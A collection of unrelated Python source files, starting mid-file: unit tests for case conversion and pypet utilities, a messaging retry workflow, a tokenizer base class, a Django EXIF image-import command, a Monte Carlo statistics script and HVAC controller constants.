"const": "FOO\\HTTP\\BAR\\STRING",
"default": "foo\\http\\bar\\string",
},
}
PRESERVE_VALUES_ACRONYM_UNICODE = {
"separate_words": {
"camel": "foo HÉÉP Bar String",
"pascal": "Foo HÉÉP Bar String",
"const": "FOO HÉÉP BAR STRING",
"default": "foo héép bar string",
},
"slash": {
"camel": "foo/HÉÉP/Bar/String",
"pascal": "Foo/HÉÉP/Bar/String",
"const": "FOO/HÉÉP/BAR/STRING",
"default": "foo/héép/bar/string",
},
"backslash": {
"camel": "foo\\HÉÉP\\Bar\\String",
"pascal": "Foo\\HÉÉP\\Bar\\String",
"const": "FOO\\HÉÉP\\BAR\\STRING",
"default": "foo\\héép\\bar\\string",
},
}
PRESERVE_VALUES_ACRONYM_SINGLE = {
"separate_words": {
"camel": "HTTP",
"pascal": "HTTP",
"const": "HTTP",
"default": "http",
},
"slash": {"camel": "HTTP", "pascal": "HTTP", "const": "HTTP", "default": "http",},
"backslash": {
"camel": "HTTP",
"pascal": "HTTP",
"const": "HTTP",
"default": "http",
},
}
CAPITAL_CASES = [
"camel",
"pascal",
"const",
"const",
]
def _expand_values(values):
test_params = []
for case in CASES:
test_params.extend(
[
(name + "2" + case, case, value, values[case])
for name, value in values.items()
]
)
test_params.append((case + "_empty", case, "", ""))
return test_params
def _expand_values_preserve(preserve_values, values):
test_params = []
for case in CASES_PRESERVE:
test_params.extend(
[
(
name + "2" + case,
case,
value,
preserve_values[case][name if name in CAPITAL_CASES else "default"],
) # nopep8
for name, value in values.items()
]
)
test_params.append((case + "_empty", case, "", ""))
return test_params
class CaseConversionTest(TestCase):
@parameterized.expand(_expand_values(VALUES))
def test(self, _, case, value, expected):
"""
Test conversions from all cases to all cases that don't preserve
capital/lower case letters.
"""
case_converter = getattr(case_conversion, case)
self.assertEqual(case_converter(value), expected)
@parameterized.expand(_expand_values(VALUES_UNICODE))
def test_unicode(self, _, case, value, expected):
"""
Test conversions from all cases to all cases that don't preserve
capital/lower case letters (with unicode characters).
"""
case_converter = getattr(case_conversion, case)
self.assertEqual(case_converter(value), expected)
@parameterized.expand(_expand_values(VALUES_SINGLE))
def test_single(self, _, case, value, expected):
"""
Test conversions of single words from all cases to all cases that
don't preserve capital/lower case letters.
"""
case_converter = getattr(case_conversion, case)
self.assertEqual(case_converter(value), expected)
@parameterized.expand(_expand_values(VALUES_SINGLE_UNICODE))
def test_single_unicode(self, _, case, value, expected):
"""
Test conversions of single words from all cases to all cases that
don't preserve capital/lower case letters (with unicode characters).
"""
case_converter = getattr(case_conversion, case)
self.assertEqual(case_converter(value), expected)
@parameterized.expand(_expand_values_preserve(PRESERVE_VALUES, VALUES))
def test_preserve_case(self, _, case, value, expected):
"""
Test conversions from all cases to all cases that do preserve
capital/lower case letters.
"""
case_converter = getattr(case_conversion, case)
self.assertEqual(case_converter(value), expected)
@parameterized.expand(
_expand_values_preserve(PRESERVE_VALUES_UNICODE, VALUES_UNICODE)
)
def test_preserve_case_unicode(self, _, case, value, expected):
"""
Test conversions from all cases to all cases that do preserve
capital/lower case letters (with unicode characters).
"""
case_converter = getattr(case_conversion, case)
self.assertEqual(case_converter(value), expected)
@parameterized.expand(
_expand_values_preserve(PRESERVE_VALUES_SINGLE, VALUES_SINGLE)
)
def test_preserve_case_single(self, _, case, value, expected):
"""
Test conversions of single words from all cases to all cases that do
preserve capital/lower case letters.
"""
case_converter = getattr(case_conversion, case)
self.assertEqual(case_converter(value), expected)
@parameterized.expand(
_expand_values_preserve(PRESERVE_VALUES_SINGLE_UNICODE, VALUES_SINGLE_UNICODE)
)
def test_preserve_case_single_unicode(self, _, case, value, expected):
"""
Test conversions of single words from all cases to all cases that do
preserve capital/lower case letters (with unicode characters).
"""
case_converter = getattr(case_conversion, case)
self.assertEqual(case_converter(value), expected)
@parameterized.expand(_expand_values(VALUES_ACRONYM))
def test_acronyms(self, _, case, value, expected):
"""
Test conversions from all cases to all cases that don't preserve
capital/lower case letters (with acronym detection).
"""
case_converter = getattr(case_conversion, case)
result = case_converter(value, acronyms=ACRONYMS)
self.assertEqual(result, expected)
@parameterized.expand(_expand_values(VALUES_ACRONYM_UNICODE))
def test_acronyms_unicode(self, _, case, value, expected):
"""
Test conversions from all cases to all cases that don't preserve
capital/lower case letters (with acronym detection and unicode
characters).
"""
case_converter = getattr(case_conversion, case)
result = case_converter(value, acronyms=ACRONYMS_UNICODE)
self.assertEqual(result, expected)
@parameterized.expand(
_expand_values_preserve(PRESERVE_VALUES_ACRONYM, VALUES_ACRONYM)
)
def test_acronyms_preserve_case(self, _, case, value, expected):
"""
Test conversions from all cases to all cases that do preserve
capital/lower case letters (with acronym detection).
"""
case_converter = getattr(case_conversion, case)
result = case_converter(value, acronyms=ACRONYMS)
self.assertEqual(result, expected)
@parameterized.expand(
_expand_values_preserve(PRESERVE_VALUES_ACRONYM_UNICODE, VALUES_ACRONYM_UNICODE)
)
def test_acronyms_preserve_case_unicode(self, _, case, value, expected):
"""
Test conversions from all cases to all cases that do preserve
capital/lower case letters (with acronym detection and unicode
characters).
"""
case_converter = getattr(case_conversion, case)
result = case_converter(value, acronyms=ACRONYMS_UNICODE)
self.assertEqual(result, expected)
|
__author__ = 'Robert Meyer'
import time
import sys
import pickle
try:
from collections import Set, Sequence, Mapping
except ImportError:
from collections.abc import Set, Sequence, Mapping
import pandas as pd
import numpy as np
import random
import copy as cp
from pypet.tests.testutils.ioutils import run_suite, make_temp_dir, remove_data, \
get_root_logger, parse_args
from pypet.trajectory import Trajectory
from pypet.parameter import ArrayParameter, Parameter, SparseParameter, PickleParameter
import unittest
from pypet.utils.explore import cartesian_product, find_unique_points
from pypet.utils.helpful_functions import progressbar, nest_dictionary, flatten_dictionary, \
result_sort, get_matching_kwargs
from pypet.utils.comparisons import nested_equal
from pypet.utils.helpful_classes import IteratorChain
from pypet.utils.decorators import retry
from pypet import HasSlots
class RaisesNTypeErrors(object):
def __init__(self, n):
self.__name__ = RaisesNTypeErrors.__name__
self.n = n
self.retries = 0
def __call__(self):
if self.retries < self.n:
self.retries += 1
raise TypeError('Nope!')
class RetryTest(unittest.TestCase):
tags = 'unittest', 'utils', 'retry'
def test_fail_after_n_tries(self):
x = RaisesNTypeErrors(5)
x = retry(4, TypeError, 0.01, 'ERROR')(x)
with self.assertRaises(TypeError):
x()
def test_succeeds_after_retries(self):
x = RaisesNTypeErrors(5)
x = retry(5, TypeError, 0.01, 'ERROR')(x)
x()
class CartesianTest(unittest.TestCase):
tags = 'unittest', 'utils', 'cartesian_product'
def test_cartesian_product(self):
cartesian_dict=cartesian_product({'param1':[1,2,3], 'param2':[42.0, 52.5]},
('param1','param2'))
result_dict = {'param1':[1,1,2,2,3,3],'param2': [42.0,52.5,42.0,52.5,42.0,52.5]}
self.assertTrue(nested_equal(cartesian_dict,result_dict), '%s != %s' %
(str(cartesian_dict),str(result_dict)))
def test_cartesian_product_combined_params(self):
cartesian_dict=cartesian_product( {'param1': [42.0, 52.5], 'param2':['a', 'b'],\
'param3' : [1,2,3]}, (('param3',),('param1', 'param2')))
result_dict={'param3':[1,1,2,2,3,3],'param1' : [42.0,52.5,42.0,52.5,42.0,52.5],
'param2':['a','b','a','b','a','b']}
self.assertTrue(nested_equal(cartesian_dict,result_dict), '%s != %s' %
(str(cartesian_dict),str(result_dict)))
class ProgressBarTest(unittest.TestCase):
tags = 'unittest', 'utils', 'progress_bar'
def test_progressbar(self):
total = 55
percentage_step = 17
for irun in range(total):
time.sleep(0.005)
progressbar(irun, total, percentage_step)
def test_progressbar_w_wo_time(self):
total = 55
percentage_step = 17
shows_time = False
for irun in range(total):
time.sleep(0.005)
s = progressbar(irun, total, percentage_step, time=True)
if s and 'remaining' in s:
shows_time = True
self.assertTrue(shows_time)
shows_time = False
for irun in range(total):
time.sleep(0.005)
s = progressbar(irun, total, percentage_step, time=False)
if s and 'remaining' in s:
shows_time = True
self.assertFalse(shows_time)
def test_progressbar_resume(self):
total = 55
for irun in range(total):
time.sleep(0.005)
progressbar(irun, total, 5)
for irun in range(2*total):
time.sleep(0.005)
progressbar(irun, 2*total, 10)
def test_progressbar_float(self):
total = 55
for irun in range(total):
time.sleep(0.005)
progressbar(irun, total, 5.1)
for irun in range(2*total):
time.sleep(0.005)
progressbar(irun, 2*total, 0.5)
def test_progressbar_logging(self):
logger = get_root_logger()
total = 33
for irun in range(total):
time.sleep(0.005)
progressbar(irun, total, logger=logger)
for irun in range(total):
time.sleep(0.005)
progressbar(irun, total, logger='GetLogger')
class TestFindUnique(unittest.TestCase):
tags = 'unittest', 'utils', 'find_unique'
def test_find_unique(self):
paramA = Parameter('ggg', 33)
paramA._explore([1, 2, 1, 2, 1, 2])
paramB = Parameter('hhh', 'a')
paramB._explore(['a', 'a', 'a', 'a', 'b', 'b'])
unique_elements = find_unique_points([paramA, paramB])
self.assertTrue(len(unique_elements) == 4)
self.assertTrue(len(unique_elements[1][1]) == 2)
self.assertTrue(len(unique_elements[3][1]) == 1)
paramC = ArrayParameter('jjj', np.zeros((3,3)))
paramC._explore([np.ones((3,3)),
np.ones((3,3)),
np.ones(499),
np.ones((3,3)),
np.zeros((3,3,3)),
np.ones(1)])
unique_elements = find_unique_points([paramA, paramC])
self.assertTrue(len(unique_elements) == 5)
self.assertTrue(len(unique_elements[1][1]) == 2)
self.assertTrue(len(unique_elements[0][1]) == 1)
unique_elements = find_unique_points([paramC, paramB])
self.assertTrue((len(unique_elements))==4)
self.assertTrue(len(unique_elements[0][1])==3)
self.assertTrue(len(unique_elements[3][1])==1)
class TestDictionaryMethods(unittest.TestCase):
tags = 'unittest', 'utils'
def test_nest_dicitionary(self):
mydict = {'a.b.c' : 4, 'a.c' : 5, 'd':4}
nested = nest_dictionary(mydict, separator='.')
expected = {'a':{'b':{'c':4}, 'c':5}, 'd':4}
self.assertTrue(expected == nested)
def test_flatten_dictionary(self):
mydict = {'a':{'b':{'c':4}, 'c':5}, 'd':4}
flattened = flatten_dictionary(mydict, separator='.')
expected = {'a.b.c' : 4, 'a.c' : 5, 'd':4}
self.assertTrue(flattened == expected)
class ResultSortFuncTest(unittest.TestCase):
tags = 'unittest', 'utils', 'result_sort'
def result_sort_sorted(the_list, start_index=0):
to_sort = the_list[start_index:]
sorted_list = sorted(to_sort, key=lambda key: key[0])
for idx_count, elem in enumerate(sorted_list):
the_list[idx_count+start_index] = elem
return the_list
def test_sort(self, start_index=0, n=100):
to_sort = list(range(n)) # list for Python 3
random.shuffle(to_sort)
to_sort = [(x,x) for x in to_sort]
result_sort(to_sort, start_index)
if start_index == 0:
compare = [(x,x,) for x in range(n)]
else:
copy_to_sort = cp.deepcopy(to_sort)
compare = result_sort(copy_to_sort, start_index)
self.assertEqual(to_sort, compare)
if start_index != 0:
self.assertNotEqual(to_sort[:start_index], [(x,x,) for x in range(n)][:start_index])
def test_sort_with_index(self):
self.test_sort(500, 1000)
class MyDummy(object):
pass
class MyDummyWithSlots(object):
__slots__ = ('a', 'b')
class MyDummyWithSlots2(HasSlots):
__slots__ = ('a', 'b')
class MyDummyCMP(object):
def __init__(self, data):
self.data = data
def __cmp__(self, other):
if self.data == other.data:
return 0
elif self.data < other.data:
return -1
else:
return 1
class MyDummySet(Set):
def __init__(self, *args, **kwargs):
self._set = set(*args, **kwargs)
def __getattr__(self, item):
return getattr(self._set, item)
def __contains__(self, item):
return self._set.__contains__(item)
def __len__(self):
return self._set.__len__()
def __iter__(self):
return self._set.__iter__()
class MyDummyList(Sequence):
def __init__(self, *args, **kwargs):
self._list = list(*args, **kwargs)
def __len__(self):
return self._list.__len__()
def __getitem__(self, item):
return self._list.__getitem__(item)
def append(self, item):
return self._list.append(item)
class MyDummyMapping(Mapping):
def __init__(self, *args, **kwargs):
self._dict = dict(*args, **kwargs)
def __getitem__(self, item):
return self._dict.__getitem__(item)
def __iter__(self):
return self._dict.__iter__()
def __len__(self):
return self._dict.__len__()
class TestEqualityOperations(unittest.TestCase):
tags = 'unittest', 'utils', 'equality'
def test_nested_equal(self):
self.assertTrue(nested_equal(4, 4))
self.assertFalse(nested_equal(4, 5))
self.assertFalse(nested_equal(5, 4))
self.assertTrue(nested_equal(4, np.int8(4)))
self.assertTrue(nested_equal(np.int8(4), 4))
self.assertFalse(nested_equal(4, np.int8(5)))
self.assertFalse(nested_equal( np.int8(5), 4))
frameA = pd.DataFrame(data={'a':[np.zeros((19,19))]}, dtype=object)
frameB = pd.DataFrame(data={'a':[np.zeros((19,19))]}, dtype=object)
self.assertTrue(nested_equal(frameA, frameB))
self.assertTrue(nested_equal(frameB, frameA))
frameB.loc[0,'a'][0,0] = 3
self.assertFalse(nested_equal(frameA, frameB))
self.assertFalse(nested_equal(frameB, frameA))
seriesA = pd.Series(data=[[np.zeros((19,19))]], dtype=object)
seriesB = pd.Series(data=[[np.zeros((19,19))]], dtype=object)
self.assertTrue(nested_equal(seriesA, seriesB))
self.assertTrue(nested_equal(seriesB, seriesA))
seriesA.loc[0] = 777
self.assertFalse(nested_equal(seriesA, seriesB))
self.assertFalse(nested_equal(seriesB, seriesA))
seriesA = pd.Series([1,2,3])
seriesB = pd.Series([1,2,3])
self.assertTrue(nested_equal(seriesA, seriesB))
self.assertTrue(nested_equal(seriesB, seriesA))
a = MyDummy()
a.g = 4
b = MyDummy()
b.g = 4
self.assertTrue(nested_equal(a, b))
self.assertTrue(nested_equal(b, a))
a.h = [1, 2, 42]
b.h = [1, 2, 43]
self.assertFalse(nested_equal(a, b))
self.assertFalse(nested_equal(b, a))
a = MyDummyWithSlots()
a.a = 1
a.b = 2
b = MyDummyWithSlots2()
b.a = 1
b.b = 2
self.assertTrue(nested_equal(a, b))
self.assertTrue(nested_equal(b, a))
a = MyDummySet([1,2,3])
a.add(4)
b = MyDummySet([1,2,3,4])
self.assertTrue(nested_equal(a, b))
self.assertTrue(nested_equal(b, a))
a = MyDummyList([1,2,3])
a.append(4)
b = MyDummyList([1,2,3,4])
self.assertTrue(nested_equal(a, b))
self.assertTrue(nested_equal(b, a))
a = MyDummyMapping(a='b', c=42)
b = MyDummyMapping(a='b', c=42)
self.assertTrue(nested_equal(a, b))
self.assertTrue(nested_equal(b, a))
a = MyDummySet([1,2,3])
a.add(4)
b = MyDummySet([1,2,3,5])
self.assertFalse(nested_equal(a, b))
self.assertFalse(nested_equal(b, a))
a = MyDummyList([1,2,3])
a.append(5)
b = MyDummyList([1,2,3,4])
self.assertFalse(nested_equal(a, b))
self.assertFalse(nested_equal(b, a))
a = MyDummyMapping(a='b', c=a)
b = MyDummyMapping(a='b', c=b)
self.assertFalse(nested_equal(a, b))
self.assertFalse(nested_equal(b, a))
a = MyDummyCMP(42)
b = MyDummyCMP(42)
self.assertTrue(nested_equal(a, b))
self.assertTrue(nested_equal(b, a))
b = MyDummyCMP(1)
self.assertFalse(nested_equal(a, b))
self.assertFalse(nested_equal(b, a))
self.assertFalse(nested_equal(a, 22))
self.assertFalse(nested_equal(22, a))
self.assertFalse(nested_equal(None, a))
self.assertFalse(nested_equal(a, None))
self.assertTrue(nested_equal(None, None))
class TestIteratorChain(unittest.TestCase):
tags = 'unittest', 'utils', 'iterators'
def test_next(self):
l1 = (x for x in range(3))
l2 = iter([3,4,5])
l3 = iter([6])
l4 = iter([7,8])
chain = IteratorChain(l1, l2, l3)
for irun in range(9):
element = next(chain)
self.assertEqual(irun, element)
if irun == 4:
chain.add(l4)
def test_iter(self):
l1 = (x for x in range(3))
l2 = iter([3,4,5])
l3 = iter([6])
l4 = iter([7,8])
chain = IteratorChain(l1, l2, l3)
count = 0
elem_list = []
for elem in chain:
self.assertEqual(elem, count)
count += 1
elem_list.append(elem)
if count == 3:
chain.add(l4)
self.assertEqual(len(elem_list), 9)
class Slots1(HasSlots):
__slots__ = 'hi'
class Slots2(Slots1):
__slots__ = ['ho']
class Slots3(Slots2):
__slots__ = ('hu', 'he')
class Slots4(Slots3):
__slots__ = ()
class SlotsTest(unittest.TestCase):
tags = 'unittest', 'utils', 'slots'
def test_all_slots(self):
slot = Slots4()
all_slots = set(('hi', 'ho', 'hu', 'he', '__weakref__'))
self.assertEqual(all_slots, slot.__all_slots__)
def test_pickling(self):
slot = Slots4()
all_slots = set(('hi', 'ho', 'hu', 'he', '__weakref__'))
new_slot = pickle.loads(pickle.dumps(slot))
self.assertEqual(all_slots, new_slot.__all_slots__)
class MyCustomLeaf(SparseParameter):
def __init__(self, full_name, data=None, comment=''):
super(MyCustomLeaf, self).__init__(full_name, data, comment)
self.v_my_property = 42
class MyCustomLeaf2(PickleParameter):
__slots__ = 'v_my_property'
def __init__(self, full_name, data=None, comment=''):
super(MyCustomLeaf2, self).__init__(full_name, data, comment)
self.v_my_property = 42
class NamingSchemeTest(unittest.TestCase):
tags = 'unittest', 'utils', 'naming', 'slots'
def test_v_property(self):
cp = MyCustomLeaf('test')
self.assertEqual(cp.vars.my_property, cp.v_my_property)
with self.assertRaises(AttributeError):
cp.v_my_other
def test_v_property_slots(self):
cp = MyCustomLeaf2('test')
self.assertEqual(cp.vars.my_property, cp.v_my_property)
with self.assertRaises(AttributeError):
cp.v_my_other
class MyClass(object):
def __init__(self, a, b, c, d=42):
pass
class MyClassNoInit(object):
pass
def kwargs_func(a, b, c=43, *args, **kwargs):
pass
def argsfunc(a, b=42, *args):
pass
def dummy(a, b, c, d=42):
pass
class MatchingkwargsTest(unittest.TestCase):
tags = 'unittest', 'utils', 'naming', 'argspec'
def test_more_than_def(self):
kwargs = dict(a=42, f=43)
res = get_matching_kwargs(dummy, kwargs)
self.assertEqual(len(res), 1)
self.assertIn('a', res)
self.assertEqual(res['a'], 42)
def test_more_than_def_args(self):
kwargs = dict(a=42, f=43)
res = get_matching_kwargs(argsfunc, kwargs)
self.assertEqual(len(res), 1)
self.assertIn('a', res)
self.assertEqual(res['a'], 42)
def test_init_method(self):
kwargs = dict(a=42, f=43)
res = get_matching_kwargs(MyClass, kwargs)
self.assertEqual(len(res), 1)
self.assertIn('a', res)
self.assertEqual(res['a'], 42)
def test_no_match_no_init(self):
kwargs = dict(a=42, f=43)
res = get_matching_kwargs(MyClassNoInit, kwargs)
self.assertEqual(len(res), 0)
def test_kwargs(self):
kwargs = dict(a=42, f=43)
res = get_matching_kwargs(kwargs_func, kwargs)
self.assertEqual(len(res), 2)
self.assertIn('a', res)
self.assertEqual(res['a'], 42)
self.assertIn('f', res)
self.assertEqual(res['f'], 43)
if __name__ == '__main__':
opt_args = parse_args()
run_suite(**opt_args)
|
"""This module defines the asynchronous reliable workflow."""
import asyncio
import functools
from typing import Tuple, Optional, List, Dict
from xml.etree import ElementTree as ET
import utilities.integration_adaptors_logger as log
from comms import queue_adaptor
from isodate import isoerror
from tornado import httpclient
from utilities import timing
from utilities.date_utilities import DateUtilities
from mhs_common import workflow
from mhs_common.errors import ebxml_handler
from mhs_common.errors.soap_handler import handle_soap_error
from mhs_common.messages.ebxml_error_envelope import EbxmlErrorEnvelope
from mhs_common.messages.soap_fault_envelope import SOAPFault
from mhs_common.routing import routing_reliability
from persistence import persistence_adaptor
from mhs_common.state import work_description as wd
from mhs_common.transmission import transmission_adaptor
from mhs_common.workflow import common_asynchronous
logger = log.IntegrationAdaptorsLogger(__name__)
class AsynchronousReliableWorkflow(common_asynchronous.CommonAsynchronousWorkflow):
"""Handles the workflow for the asynchronous reliable messaging pattern."""
def __init__(self, party_key: str = None, persistence_store: persistence_adaptor.PersistenceAdaptor = None,
transmission: transmission_adaptor.TransmissionAdaptor = None,
queue_adaptor: queue_adaptor.QueueAdaptor = None,
max_request_size: int = None,
routing: routing_reliability.RoutingAndReliability = None):
super().__init__(party_key, persistence_store, transmission, queue_adaptor, max_request_size, routing)
self.workflow_specific_interaction_details = dict(duplicate_elimination=True,
ack_requested=True,
ack_soap_actor="urn:oasis:names:tc:ebxml-msg:actor:toPartyMSH",
sync_reply=True)
self.workflow_name = workflow.ASYNC_RELIABLE
@timing.time_function
async def handle_outbound_message(self, from_asid: Optional[str],
message_id: str, correlation_id: str, interaction_details: dict,
payload: str,
wdo: Optional[wd.WorkDescription]) \
-> Tuple[int, str, Optional[wd.WorkDescription]]:
logger.info('Entered async reliable workflow to handle outbound message')
wdo = await self._create_new_work_description_if_required(message_id, wdo, self.workflow_name)
logger.audit('Outbound {WorkflowName} workflow invoked.', fparams={'WorkflowName': self.workflow_name})
try:
details = await self._lookup_endpoint_details(interaction_details)
url = details[self.ENDPOINT_URL]
to_party_key = details[self.ENDPOINT_PARTY_KEY]
cpa_id = details[self.ENDPOINT_CPA_ID]
except Exception:
await wdo.set_outbound_status(wd.MessageStatus.OUTBOUND_MESSAGE_PREPARATION_FAILED)
return 500, 'Error obtaining outbound URL', None
reliability_details = await self._lookup_reliability_details(interaction_details)
retry_interval_xml_datetime = reliability_details[common_asynchronous.MHS_RETRY_INTERVAL]
try:
retry_interval = DateUtilities.convert_xml_date_time_format_to_seconds(retry_interval_xml_datetime)
except isoerror.ISO8601Error:
await wdo.set_outbound_status(wd.MessageStatus.OUTBOUND_MESSAGE_PREPARATION_FAILED)
return 500, 'Error when converting retry interval: {} to seconds'.format(retry_interval_xml_datetime), None
error, http_headers, message = await self._serialize_outbound_message(message_id, correlation_id,
interaction_details,
payload, wdo, to_party_key, cpa_id)
if error:
return error[0], error[1], None
return await self._make_outbound_request_with_retries_and_handle_response(url, http_headers, message, wdo,
reliability_details, retry_interval)
async def _make_outbound_request_with_retries_and_handle_response(self, url: str, http_headers: Dict[str, str],
message: str, wdo: wd.WorkDescription,
reliability_details: dict, retry_interval: float):
num_of_retries = int(reliability_details[common_asynchronous.MHS_RETRIES])
# retries_remaining is a mutable integer. This is done by putting an (immutable) integer into
# a mutable container.
retries_remaining = [num_of_retries]
handle_error_response = functools.partial(self._handle_error_response,
num_of_retries=num_of_retries, retries_remaining=retries_remaining)
while True:
try:
return await self._make_outbound_request_and_handle_response(url, http_headers, message, wdo,
handle_error_response)
except _NeedToRetryException:
retries_remaining[0] -= 1
logger.info("Waiting for {retry_interval} seconds before next request attempt.",
fparams={"retry_interval": retry_interval})
await asyncio.sleep(retry_interval)
continue
def _handle_error_response(self, response: httpclient.HTTPResponse, num_of_retries: int,
retries_remaining: List[int]):
try:
parsed_body = ET.fromstring(response.body)
if EbxmlErrorEnvelope.is_ebxml_error(parsed_body):
_, parsed_response = ebxml_handler.handle_ebxml_error(response.code,
response.headers,
response.body)
logger.warning('Received ebxml errors from Spine. {HTTPStatus} {Errors}',
fparams={'HTTPStatus': response.code, 'Errors': parsed_response})
elif SOAPFault.is_soap_fault(parsed_body):
_, parsed_response, soap_fault_codes = handle_soap_error(response.code,
response.headers,
response.body)
logger.warning('Received soap errors from Spine. {HTTPStatus} {Errors}',
fparams={'HTTPStatus': response.code, 'Errors': parsed_response})
if SOAPFault.is_soap_fault_retriable(soap_fault_codes):
logger.warning("A retriable error was encountered {error} {retries_remaining} {max_retries}",
fparams={
"error": parsed_response,
"retries_remaining": retries_remaining[0],
"max_retries": num_of_retries
})
if retries_remaining[0] <= 0:
# exceeded the number of retries so return the SOAP error response
logger.error("A request has exceeded the maximum number of retries, {max_retries} retries",
fparams={"max_retries": num_of_retries})
else:
raise _NeedToRetryException()
else:
logger.warning("Received an unexpected response from Spine", fparams={'HTTPStatus': response.code})
parsed_response = "Didn't get expected response from Spine"
except ET.ParseError:
logger.exception('Unable to parse response from Spine.')
parsed_response = 'Unable to handle response returned from Spine'
return 500, parsed_response, None
class _NeedToRetryException(Exception):
pass
|
# -*- coding: utf-8 -*-
from abc import ABCMeta, abstractmethod
class Scanner(metaclass=ABCMeta):
EOF = None
def __init__(self, source):
self.source = source
self.cur_token = None
def current_token(self):
return self.cur_token
def next_token(self):
self.cur_token = self.extract_token()
return self.cur_token
@abstractmethod
def extract_token(self):
raise NotImplementedError()
def current_char(self):
return self.source.current_char()
def next_char(self):
return self.source.next_char()
|
from django.core.management.base import BaseCommand
from django.core.files import File
import os
import exifread
from data.models import SkyPicture, MeasuringDevice
import datetime
from fractions import Fraction
from data.tasks import gator, computeProjection
class Command(BaseCommand):
help = 'Import sky images stored in a user specified folder'
def add_arguments(self, parser):
parser.add_argument(
'--folder',
action = 'store',
dest = 'folder',
default = False,
help = 'Folder to read',
)
parser.add_argument(
'--device',
action = 'store',
dest = 'device',
default = False,
help = 'Name of the sky imager as stored in the database',
)
def handle(self, *args, **options):
print options
try:
directory = options['folder']
files_in_dir = os.listdir(directory)
except:
print ('Missing input file or unable to open')
return
try:
print options['device']
device = MeasuringDevice.objects.get(name = options['device'])
except:
print 'Missing or wrong device name'
return
for file_in_dir in files_in_dir:
if os.path.isdir(os.path.join(directory, file_in_dir)):
continue
if not file_in_dir.endswith(('JPG', 'jpg', 'jpeg')):
continue
print 'Current file: ' + file_in_dir
# Create a new sky imager object, reading values from EXIF metadata
img = SkyPicture()
img.device = device
try:
f = open(os.path.join(directory, file_in_dir), 'r')
tags = exifread.process_file(f)
except:
continue
if not 'EXIF ExposureTime' in tags or not 'EXIF FNumber' in tags or not 'EXIF ISOSpeedRatings' in tags or not 'EXIF DateTimeOriginal' in tags:
continue
img.exposure_time = str(float(Fraction(str(tags['EXIF ExposureTime']))))
print 'Exposure time: ' + str(img.exposure_time)
img.aperture_value = str(float(Fraction(str(tags['EXIF FNumber']))))
print 'Aperture value: ' + str(img.aperture_value)
img.ISO_speed = int(str(tags['EXIF ISOSpeedRatings']))
print 'ISO speed: ' + str(img.ISO_speed)
dt = datetime.datetime.strptime(str(tags['EXIF DateTimeOriginal']), "%Y:%m:%d %H:%M:%S")
img.date = dt.date()
print 'Date: ' + str(img.date)
img.time = dt.time()
print 'Time: ' + str(img.time)
img.undistorted = "undistorted/TODO.png"
if SkyPicture.objects.filter(device = img.device).filter(date = img.date).filter(time = img.time).count() > 0:
print 'Image already in the database'
continue
filename = dt.strftime("%Y-%m-%d-%H-%M-%S-") + img.device.username.username + ".jpg"
print filename
img.image.save(filename, File(f), True)
img.save()
gator.task(computeProjection, img.id)
print ''
|
import numpy as np
from qflow.wavefunctions import SimpleGaussian
from qflow.hamiltonians import HarmonicOscillator
from qflow.samplers import ImportanceSampler
from qflow.statistics import compute_statistics_for_series, statistics_to_tex
from qflow.mpi import mpiprint
N, D = 100, 3
system = np.empty((N, D))
H = HarmonicOscillator(omega_ho=1)
psi_opt = SimpleGaussian(alpha=0.5)
psi_nopt = SimpleGaussian(alpha=0.51)
sampler_opt = ImportanceSampler(system, psi_opt, 0.1)
sampler_nopt = ImportanceSampler(system, psi_nopt, 0.1)
sampler_opt.thermalize(10000)
sampler_nopt.thermalize(10000)
samples = 2 ** 23
stats = [
compute_statistics_for_series(H.local_energy_array(sampler_opt, psi_opt, 100) / N),
compute_statistics_for_series(
H.local_energy_array(sampler_nopt, psi_nopt, samples) / N, method="blocking"
),
]
labels = [r"$\alpha_G = 0.5$", r"$\alpha_G=0.51$"]
mpiprint(statistics_to_tex(stats, labels, filename=__file__ + ".table1.tex"))
stats = [
compute_statistics_for_series(H.mean_radius_array(sampler_opt, samples)),
compute_statistics_for_series(H.mean_squared_radius_array(sampler_opt, samples)),
]
labels = [r"$<r>$", r"$<r^2>$"]
mpiprint(statistics_to_tex(stats, labels, filename=__file__ + ".table2.tex"))
|
# -*- coding: utf-8 -*-
# Copyright 2020 Kevin Schlosser
import datetime
import threading
from ..utils import (
get_bit as _get_bit,
set_bit as _set_bit
)
from ..packet import (
GetConfigurationRequest,
GetStatusRequest
)
from ..commands import (
FanKeySelection,
HeatDemand,
AuxHeatDemand,
BackUpHeatDemand,
FanDemand,
ChangeFilterTimeRemaining,
ChangeUvLightMaintenanceTimer,
ChangeHumidifierPadMaintTimerall,
CoolDemand,
SystemSwitchModify,
DehumidificationDemand,
HumidificationDemand,
FAN_DEMAND_MANUAL as _FAN_DEMAND_MANUAL,
FAN_DEMAND_COOL as _FAN_DEMAND_COOL,
FAN_DEMAND_HEAT as _FAN_DEMAND_HEAT,
FAN_DEMAND_AUX_HEAT as _FAN_DEMAND_AUX_HEAT,
FAN_DEMAND_EMERGENCY_HEAT as _FAN_DEMAND_EMERGENCY_HEAT,
FAN_DEMAND_DEFROST as _FAN_DEMAND_DEFROST
)
ZONE_CONTROLLER_CAPABLE = 0x01
ZONE_CONTROLLER_NOT_CAPABLE = 0x00
ZONE_CONTROLLER_SYSTEM_TYPE_UNKNOWN = 0x00
ZONE_CONTROLLER_SYSTEM_TYPE_CONVENTIONAL = 0x01
ZONE_CONTROLLER_SYSTEM_TYPE_HEAT_PUMP = 0x02
ZONE_CONTROLLER_SYSTEM_TYPE_DUAL_FUEL = 0x03
ZONE_CONTROLLER_SYSTEM_TYPE_COOLING = 0x04
ZONE_CONTROLLER_SYSTEM_TYPE_GAS_HEAT = 0x05
ZONE_CONTROLLER_SYSTEM_TYPE_ELECTRIC_HEAT = 0x06
ZONE_CONTROLLER_SYSTEM_TYPE_ELECTRIC_ONLY = 0x07
ZONE_CONTROLLER_SYSTEM_TYPE_FAN_ONLY = 0x08
ZONE_CONTROLLER_SYSTEM_TYPE_GEOTHERMAL_HEAT_PUMP = 0x09
ZONE_CONTROLLER_SYSTEM_TYPE_GEOTHERMAL_DUAL_FUEL = 0x0A
ZONE_CONTROLLER_SYSTEM_TYPE_BOILER = 0x0B
ZONE_CONTROLLER_SYSTEM_TYPE_BOILER_HEAT_PUMP = 0x0C
ZONE_CONTROLLER_SYSTEM_TYPE_DEFAULT = 0x7F
ZONE_CONTROLLER_SYSTEM_TYPE_OTHER = 0xFF
ZONE_CONTROLLER_FAN_STATUS_AUTO = 0x00
ZONE_CONTROLLER_FAN_STATUS_ALWAYS_ON = 0x01
ZONE_CONTROLLER_FAN_STATUS_OCCUPIED_ON = 0x02
